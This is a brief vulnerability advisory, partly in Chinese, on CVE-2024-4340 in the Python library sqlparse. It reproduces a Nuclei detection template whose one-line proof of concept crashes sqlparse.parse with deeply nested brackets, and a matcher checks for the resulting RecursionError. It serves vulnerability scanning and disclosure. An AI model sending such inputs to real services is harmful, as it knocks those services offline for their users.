CVE-2024-4340: sqlparse - Denial of Service

日期: 2025-08-01 | 影响软件: sqlparse | POC: 已公开

漏洞描述

Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.

PoC代码[已公开]

id: CVE-2024-4340

info:
  name: sqlparse - Denial of Service
  author: KoYejune0302,cheoljun99,sim4110,gy741
  severity: high
  description: |
    Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2024-4340
    epss-score: 0.14988
    epss-percentile: 0.94326
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4340
  tags: cve,cve2024,py,code,dos,python,sqlparse

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      python -c "import sqlparse; sqlparse.parse('[' * 10000 + ']' * 10000)"

    matchers:
      - type: word
        part: stderr
        words:
          - "RecursionError: maximum recursion depth exceeded"
# digest: 4a0a0047304502205b1710a316b0aff14d49440261ed0afde956081baa98afdd7a49a190bc8ce6c5022100f712bcae0ad7893297691bc40c72ab32b8b82bfbd06ccd5207443c903c464cf4:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/code/cves/2024/CVE-2024-4340.yaml